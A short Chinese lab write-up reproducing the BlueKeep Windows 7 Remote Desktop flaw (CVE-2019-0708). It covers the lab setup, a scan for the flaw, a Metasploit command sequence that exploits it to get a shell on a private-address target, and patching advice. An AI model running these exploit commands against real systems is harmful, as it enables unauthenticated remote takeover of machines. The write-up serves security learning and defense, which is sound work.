windows7漏洞复现
远程代码执行-CVE-2019-0708
漏洞简称:远程代码执行漏洞
漏洞编号:CVE-2019-0708
漏洞类型:远程桌面3389
漏洞说明:此漏洞是2019年披露的windows远程桌面服务的漏洞,编号为CVE-2019-0708,该漏洞在不需身份认证的情况下可远程触发,攻击者可利用此漏洞getshell,危害性挺大的,影响范围极广
漏洞影响版本
1 | Windows 7 |
漏洞利用
环境准备
靶机:windows 7 IP:192.168.1.75(关闭防火墙)
攻击机:kali2-5.10.0
漏洞检测
漏洞检测工具下载:链接
- 打开靶机,开启远程桌面服务
- 利用漏洞检测工具扫描靶机,发现存在该漏洞
漏洞利用
下面用Metasploit利用该漏洞getshell
- 打开攻击机,进入msf控制台,找到漏洞利用模块
- 输入以下命令以利用漏洞
1
2
3
4use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.75
set target 1 #可先用show target命令查看执行攻击目标
exploit - 成功getshell
漏洞修复建议
- 下载对应补丁包
- 关闭rdp远程桌面服务
- 开启防火墙
评论